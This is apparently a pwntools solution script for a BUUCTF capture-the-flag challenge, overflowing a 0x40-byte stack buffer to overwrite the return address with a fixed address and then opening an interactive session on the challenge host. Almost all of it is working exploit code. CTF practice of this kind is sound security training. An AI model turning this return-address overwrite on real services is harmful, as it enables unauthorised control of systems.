和 BUU rip 一样的解法
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from pwn import p64, u64, p32, u32
import os
# pwntools runtime configuration: gdb pane layout for gdb.attach(), full
# traffic logging, and x86-64 packing for p64()/u64().
context.update(
    terminal=['tmux', 'splitw', '-h', '-p', '80'],
    log_level='debug',
    arch='amd64',
)

# Challenge endpoint and the local copy of the target binary.
host = 'node5.buuoj.cn'
port = 28415
fileName = './pwn'
# libcName = './libc.so.6'

# Target selection: swap the comment markers to run against a local process
# or a locally forwarded socket instead of the remote service.
# r = process(fileName)
# r = remote('127.0.0.1', 10001)
r = remote(host, port)
elf = ELF(fileName)
# libc = ELF(libcName)
def debug(p, cmd=''):
    """Attach gdb to tube *p* and pause until the debugger is ready.

    Args:
        p: the pwntools tube to attach gdb to.
        cmd: gdb command string handed straight to gdb.attach (default: none).

    Returns:
        None. Does nothing when VSCODE_INJECTION is set in the environment —
        presumably the script is then driven from the IDE's own debugger
        session; confirm.
    """
    ide_session = os.environ.get('VSCODE_INJECTION')
    if not ide_session:
        gdb.attach(p, cmd)
        pause()
# Give gdb a chance to attach before any input is sent (no-op when
# VSCODE_INJECTION is set — see debug()).
debug(r)

# Stack-overflow payload: the 0x40-byte buffer and the 8-byte saved rbp are
# filled with a cyclic pattern, then the saved return address is replaced
# with the constant below.  A fixed 0x4006xx address only works against a
# non-PIE binary, and the overwrite only survives if no stack canary sits in
# front of the saved rbp — presumably both hold here; confirm with checksec.
# What lives at that address is not visible from this script.
ret_offset = 0x40 + 8
ret_target = 0x40060e
payload = cyclic(ret_offset) + p64(ret_target)

# The first prompt ends in a newline; answer it with the payload, then hand
# the connection over to the operator.
r.sendlineafter(b'\n', payload)
r.interactive()